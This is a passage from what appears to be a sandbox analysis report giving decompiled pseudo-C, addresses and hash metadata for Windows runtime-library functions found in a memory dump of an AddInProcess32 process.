					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E018DF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E0186EB70(_t29, 0x19470a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0189B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E018DF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x19470c0; // 0x0
					while(_t38 != 0x19470c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x194b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x0185c96a
0x0185c974
0x0185c988
0x0185c98a
0x018c7c9d
0x018c7c9f
0x018c7ca4
0x018c7cae
0x018c7cf0
0x018c7cf5
0x018c7cfa
0x0185c992
0x0185c996
0x0185c997
0x0185c998
0x0185c9a3
0x0185c9a3
0x018c7cb0
0x018c7cb7
0x018c7cbb
0x00000000
0x00000000
0x018c7cbd
0x018c7ce8
0x018c7cc5
0x018c7cc8
0x018c7cca
0x018c7cd0
0x018c7cd6
0x018c7cde
0x018c7ce4
0x018c7ce4
0x018c7cd0
0x00000000
0x018c7ce8
0x0185c990
0x00000000

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7affd1e8e383e317cdde583c51ee448abf41c633b176586d7ca16cfa8bb3cfe4
Instruction ID: 04953e33c3ac50fb1c563ef9c3a9c6cfb1a06d855909aa79e349e14aaf2683c4
Opcode Fuzzy Hash: 7affd1e8e383e317cdde583c51ee448abf41c633b176586d7ca16cfa8bb3cfe4
Instruction Fuzzy Hash: DB11C23530070B9BCB25AF6DDC8592AB7E5BB94B14B00052CE946C3651EB30EE10CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 0188FAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0188FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E0186EEF0(0x1947b60);
					_t134 =  *0x1947b84; // 0x77997b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1947b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1947b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01866D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E018676E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E018F8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0185B150();
													}
													_t116 = E018F6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E018675CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1948638; // 0x0
																	_t122 = L018638A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E018676E2(_t154);
																			goto L41;
																		}
																	} else {
																		E018676E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0188FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L018670F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0188FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0188FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0188FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0188FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0188FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1947b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1947b84 = _t75;
						_t73 = E0186EB70(_t134, 0x1947b60);
						if( *0x1947b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E0186FF60( *0x1947b20);
							}
						}
						goto L5;
					}
				}
			}

0x0188fab0
0x0188fab2
0x0188fab3
0x0188fab4
0x0188fabc
0x0188fac0
0x0188fb14
0x0188fb17
0x0188fac2
0x0188fac8
0x0188facd
0x0188fad3
0x0188fad3
0x0188fadd
0x0188fb18
0x0188fb1b
0x0188fb1d
0x0188fb1e
0x0188fb1f
0x0188fb20
0x0188fb21
0x0188fb22
0x0188fb23
0x0188fb24
0x0188fb25
0x0188fb26
0x0188fb27
0x0188fb28
0x0188fb29
0x0188fb2a
0x0188fb2b
0x0188fb2c
0x0188fb2d
0x0188fb2e
0x0188fb2f
0x0188fb3a
0x0188fb3b
0x0188fb3e
0x0188fb41
0x0188fb44
0x0188fb47
0x0188fb4a
0x0188fb4d
0x0188fb53
0x018cbdcb
0x018cbdcb
0x0188fb59
0x0188fb5b
0x0188fb5b
0x0188fb5e
0x018cbdd5
0x018cbdd8
0x00000000
0x018cbdda
0x00000000
0x018cbdda
0x0188fb64
0x0188fb64
0x0188fb64
0x0188fb67
0x0188fb6e
0x0188fb70
0x0188fb72
0x00000000
0x0188fb78
0x0188fb7a
0x0188fb7a
0x0188fb7d
0x0188fb80
0x018cbddf
0x018cbde1
0x00000000
0x018cbde3
0x00000000
0x018cbde3
0x0188fb86
0x0188fb86
0x0188fb86
0x0188fb8b
0x0188fb90
0x0188fb92
0x0188fb94
0x0188fb9a
0x0188fb9b
0x0188fba1
0x018cbde8
0x018cbdeb
0x018cbded
0x018cbeb5
0x018cbeb5
0x018cbebb
0x018cbebd
0x018cbec3
0x018cbed2
0x018cbedd
0x018cbedd
0x018cbeed
0x00000000
0x018cbdf3
0x018cbdfe
0x018cbe06
0x018cbe0b
0x018cbe0d
0x018cbe0f
0x018cbe14
0x018cbe19
0x018cbe20
0x018cbe25
0x018cbe27
0x018cbe35
0x018cbe39
0x018cbe46
0x018cbe4f
0x018cbe54
0x018cbe56
0x018cbef8
0x018cbef8
0x00000000
0x018cbe5c
0x018cbe5c
0x018cbe60
0x00000000
0x018cbe66
0x018cbe66
0x018cbe7f
0x018cbe84
0x018cbe87
0x018cbe89
0x018cbe8b
0x018cbe99
0x018cbe9d
0x018cbea0
0x018cbeac
0x018cbeaf
0x018cbeb1
0x018cbeb3
0x018cbeb3
0x00000000
0x018cbea2
0x018cbea2
0x00000000
0x018cbea2
0x018cbe8d
0x018cbe8d
0x018cbe92
0x00000000
0x018cbe92
0x018cbe8b
0x018cbe60
0x018cbe3b
0x018cbe3b
0x018cbe3e
0x00000000
0x018cbe40
0x018cbe40
0x018cbe44
0x00000000
0x00000000
0x00000000
0x00000000
0x018cbe44
0x018cbe3e
0x018cbe29
0x018cbe29
0x00000000
0x018cbe29
0x018cbe27
0x00000000
0x0188fba7
0x0188fba7
0x0188fbab
0x018cbf02
0x0188fbb1
0x0188fbb1
0x0188fbb8
0x0188fbbd
0x0188fbbd
0x0188fbbf
0x0188fbbf
0x0188fbc5
0x0188fbcb
0x0188fbf8
0x0188fbf8
0x0188fbfa
0x00000000
0x0188fc00
0x0188fc00
0x0188fc03
0x00000000
0x0188fc09
0x0188fc09
0x0188fc0f
0x0188fc15
0x0188fc23
0x0188fc23
0x0188fc25
0x0188fc27
0x0188fc75
0x0188fc7c
0x0188fc84
0x00000000
0x0188fc29
0x0188fc29
0x0188fc2d
0x0188fc30
0x018cbf0f
0x00000000
0x0188fc36
0x0188fc38
0x0188fc3b
0x0188fc41
0x018cbf17
0x018cbf19
0x018cbf48
0x018cbf4b
0x00000000
0x018cbf1b
0x018cbf22
0x018cbf24
0x018cbf26
0x00000000
0x018cbf2c
0x018cbf37
0x018cbf39
0x018cbf3b
0x00000000
0x018cbf41
0x018cbf41
0x018cbf41
0x018cbf41
0x018cbf45
0x00000000
0x018cbf45
0x018cbf3b
0x018cbf26
0x00000000
0x0188fc47
0x0188fc47
0x0188fc49
0x0188fcb2
0x0188fcb4
0x0188fcb6
0x0188fcdc
0x0188fcdc
0x00000000
0x0188fcb8
0x0188fcc3
0x0188fcc5
0x0188fcc7
0x00000000
0x0188fcc9
0x0188fcc9
0x0188fccd
0x00000000
0x0188fccd
0x0188fcc7
0x00000000
0x0188fc4b
0x0188fc4b
0x0188fc4e
0x0188fc4e
0x0188fc51
0x0188fc51
0x0188fc54
0x0188fc5a
0x0188fc5c
0x0188fc5f
0x0188fc61
0x0188fc63
0x0188fc65
0x0188fc67
0x0188fc6e
0x0188fc72
0x0188fc72
0x0188fc72
0x0188fc72
0x0188fc67
0x0188fc61
0x00000000
0x0188fc5a
0x0188fc49
0x0188fc41
0x0188fc30
0x0188fc27
0x0188fc03
0x0188fbcd
0x0188fbd3
0x0188fbd9
0x0188fbdc
0x0188fbde
0x0188fc99
0x0188fc9b
0x0188fc9d
0x0188fcd5
0x0188fcd5
0x0188fc89
0x0188fc89
0x00000000
0x0188fc9f
0x0188fc9f
0x0188fca3
0x00000000
0x0188fca3
0x00000000
0x0188fbe4
0x0188fbe4
0x0188fbe4
0x0188fbe4
0x0188fbe9
0x0188fbf2
0x00000000
0x0188fbf2
0x0188fbde
0x0188fbcb
0x0188fbab
0x0188fc8b
0x0188fc8b
0x0188fc8c
0x0188fb80
0x0188fb72
0x0188fb5e
0x0188fc8d
0x0188fc91
0x0188fadf
0x0188fadf
0x0188fae1
0x0188fae4
0x0188fae7
0x0188faec
0x0188faf8
0x0188fb00
0x0188fb07
0x0188fb0f
0x0188fb0f
0x0188fb07
0x00000000
0x0188faf8
0x0188fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 018CBE0F

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: 1ea0ae1648eb4c17a3f494c2bf1ba9a0a3230cad1637014429b0bfb5c438d632
Instruction ID: f0379d6e88f017ee96e467abafcd881dee20a7dc00e16ebee702b5c0412e8f12
Opcode Fuzzy Hash: 1ea0ae1648eb4c17a3f494c2bf1ba9a0a3230cad1637014429b0bfb5c438d632
Instruction Fuzzy Hash: 7EA10231B00A1A8BEB35EF6CC450B6AB7A5AF44B64F04456DEB06CB681DB34DB41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01852D8A Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E01852D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1945350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1947bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E018997C0();
				}
				if( *0x19479c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x19479c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E01881624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01877D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E018EFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E01899520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0188E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								E018ADF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1946901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1946901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E01899980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E018995D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01877D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01877D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E018D7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E018EFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1945350;
							if(_t109 != 0x1945350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E018EFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E018E5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x01852d8a
0x01852d8a
0x01852d92
0x01852d96
0x01852d9e
0x01852da0
0x01852da3
0x01852da5
0x01852da8
0x01852dab
0x01852db2
0x018af9aa
0x018af9ab
0x018af9ae
0x018af9ae
0x01852db8
0x01852dc2
0x018af9b9
0x018af9be
0x018af9bf
0x018af9bf
0x01852dcf
0x018af9c9
0x01852dd5
0x01852dd5
0x01852dd5
0x01852dde
0x01852de1
0x01852e70
0x01852e72
0x01852e72
0x01852de7
0x01852deb
0x01852e7c
0x01852e83
0x01852e85
0x01852e8b
0x01852e8d
0x01852e92
0x01852e92
0x01852e85
0x01852df1
0x01852df7
0x01852df9
0x01852df9
0x01852dfc
0x01852dff
0x01852e02
0x00000000
0x01852e05
0x01852e0c
0x018af9d9
0x01852e12
0x01852e12
0x01852e12
0x01852e1a
0x018af9e3
0x018af9e9
0x018af9f0
0x018af9f6
0x018af9f8
0x018af9f8
0x018af9f0
0x01852e23
0x018afa02
0x018afa03
0x018afa05
0x018afa06
0x00000000
0x01852e29
0x01852e29
0x01852e2e
0x01852e34
0x01852e3e
0x00000000
0x00000000
0x01852e44
0x01852e47
0x01852e4d
0x00000000
0x00000000
0x01852e4f
0x01852e54
0x00000000
0x00000000
0x01852e5a
0x01852e5f
0x01852e9a
0x01852ea4
0x01852ea5
0x01852ea8
0x01852eaf
0x01852eb2
0x01852eb5
0x018afae9
0x018afaeb
0x018afaed
0x018afaef
0x018afaf7
0x018afaf8
0x018afafd
0x018afaff
0x018afb04
0x018afb04
0x018afaff
0x01852ec0
0x01852ec4
0x01852ec6
0x01852ec8
0x018afb14
0x018afb18
0x018afb1e
0x018afb21
0x018afb21
0x01852ece
0x01852ece
0x01852ece
0x01852ed7
0x01852e61
0x01852e63
0x018afa6b
0x018afa71
0x018afa76
0x018afa78
0x018afa8a
0x018afa7a
0x018afa83
0x018afa83
0x018afa8f
0x018afa91
0x018afa97
0x018afa9d
0x018afaa4
0x018afaaa
0x018afaaf
0x018afab1
0x018afac3
0x018afab3
0x018afabc
0x018afabc
0x018afac8
0x018afacb
0x018afadf
0x018afadf
0x018afacb
0x018afaa4
0x018afa91
0x01852e6f
0x01852e6f
0x01852e5f
0x018afa13
0x018afa15
0x018afa17
0x018afa1f
0x018afa21
0x018afa22
0x018afa25
0x018afa28
0x018afa2f
0x018afa2f
0x018afa2a
0x018afa2a
0x018afa2a
0x018afa31
0x018afa34
0x018afa36
0x018afa3c
0x018afa3e
0x018afa41
0x018afa43
0x018afa45
0x018afa45
0x018afa41
0x018afa3c
0x018afa4a
0x018afa4f
0x018afa51
0x018afa53
0x018afa56
0x018afa5b
0x018afa5e
0x00000000
0x018afa5e
0x01852e23

Strings

RTL: Re-Waiting, xrefs: 018AFA4A

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: f7d9acbda4be7feb1f2124e998bb27832e9e675b8ae749e98da763403ffe0086
Instruction ID: 7299132cc915934c23c965e189cf0bd31351901ebdaab006f4cca647d8240e0c
Opcode Fuzzy Hash: f7d9acbda4be7feb1f2124e998bb27832e9e675b8ae749e98da763403ffe0086
Instruction Fuzzy Hash: 8561F731A00649DFEB32DB6CC894BBE7BA6EB44718F580259DA11D72C1DB34AB41C791

Uniqueness

Uniqueness Score: -1.00%

Function 01920EA5 Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E01920EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E0191FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E01921074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E01899730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E0191A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E0191A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x1948b04 >> 0x14) + (_v44 -  *0x1948b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E01877D50() == 0) {
